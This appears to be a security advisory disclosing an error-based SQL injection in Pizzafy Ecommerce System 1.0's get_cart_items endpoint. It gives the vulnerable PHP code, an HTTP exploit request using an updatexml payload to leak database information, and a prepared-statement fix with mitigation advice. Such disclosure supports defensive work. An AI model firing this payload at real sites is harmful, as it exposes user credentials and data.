Pizzafy Ecommerce System 1.0 Error-Based SQL Injection Vulnerability

# Pizzafy Ecommerce System 1.0 SQL Injection Vulnerability Summary ## Vulnerability Overview * **Affected Version**: Pizzafy Ecommerce System 1.0 * **Vulnerability Type**: Error-Based SQL Injection * **Severity**: HIGH * **Vulnerable Location**: `/pizzafy/admin/ajax.php?action=get_cart_items&id=6` * **Description**: In the `select` functionality, the `id` parameter and `user_id` column are not properly sanitized, allowing attackers to inject malicious SQL commands into backend database queries. ## Impact Scope * **Confidentiality**: Full disclosure of database schema and user credentials. * **Integrity**: Unauthorized deletion or modification of records. * **Availability**: Service denial due to large-scale data deletion. * **Privilege Escalation**: Session hijacking and administrative access. ## Proof of Concept (PoC) **1. Vulnerable Code** ```php public function get_cart_items() { if(!isset($_SESSION['login_user_id'])) { return ['items' => []]; } $user_id = $_SESSION['login_user_id']; if (isset($_GET['id'])) { $user_id = $_GET['id']; } $sql = "SELECT c.id as cart_id, c.product_id, c.qty, p.name, p.price FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = $user_id"; $result = $this->conn->query($sql); if (!$result) { return ['items' => [], 'error' => $this->conn->error]; } $items = []; $total = 0; if ($result && $result->num_rows > 0) { while($row = $result->fetch_assoc()) { $subtotal = $row['price'] * $row['qty']; $total += $subtotal; $items[] = [ 'cart_id' => $row['cart_id'], 'product_id' => $row['product_id'], 'name' => $row['name'], 'qty' => $row['qty'], 'price' => (float)$row['price'], 'subtotal' => (float)$subtotal ]; } } return ['items' => $items, 'total' => $total]; } ``` **2. Exploit Payload** ```http GET /pizzafy/admin/ajax.php?action=get_cart_items&id=6%20AND%20updatexml(1,concat(0x7e,database()),1)%23 HTTP/1.1 Host: localhost sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/index.php?page=home Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jeju15623h3yxadwq12jpr94i Connection: close ``` ## Remediation **1. Remediation Code** ```php public function get_cart_items() { if(!isset($_SESSION['login_user_id'])) { return ['items' => []]; } $user_id = (int)$_SESSION['login_user_id']; // Remove the code // if (isset($_GET['id'])) { // $user_id = $_GET['id']; // } $stmt = $this->conn->prepare("SELECT c.id as cart_id, c.product_id, c.qty, p.name, p.price FROM cart c JOIN product_list p ON c.product_id = p.id WHERE c.user_id = ?"); $stmt->bind_param("i", $user_id); $stmt->execute(); $result = $stmt->get_result(); if (!$result) { error_log("Erro em get_cart_items: " . $this->conn->error); return ['items' => []]; } $items = []; $total = 0; if ($result && $result->num_rows > 0) { while($row = $result->fetch_assoc()) { $subtotal = $row['price'] * $row['qty']; $total += $subtotal; $items[] = [ 'cart_id' => $row['cart_id'], 'product_id' => $row['product_id'], 'name' => $row['name'], 'qty' => $row['qty'], 'price' => (float)$row['price'], 'subtotal' => (float)$subtotal ]; } } return ['items' => $items, 'total' => $total]; } ``` **2. Mitigation Recommendations** 1. **Use Prepared Statements**: Employ parameterized queries to prevent SQL injection. 2. **Input Validation**: Validate and sanitize the `id` parameter and `id` column, allowing only expected values. 3. **Database Permissions**: Restrict database user privileges to limit the potential damage of SQL injection. 4. **Monitoring and Logging**: Track and alert on anomalous patterns, such as SQL queries or repeated access attempts. 5. **Security Testing**: Conduct regular penetration testing and code reviews to identify and mitigate vulnerabilities. 6. **Error Handling**: Avoid exposing database-related errors in responses, as this may assist attackers.

Goal Reached Thanks to every supporter — we hit 100%!

Pizzafy Ecommerce System 1.0 Error-Based SQL Injection Vulnerability

More from this source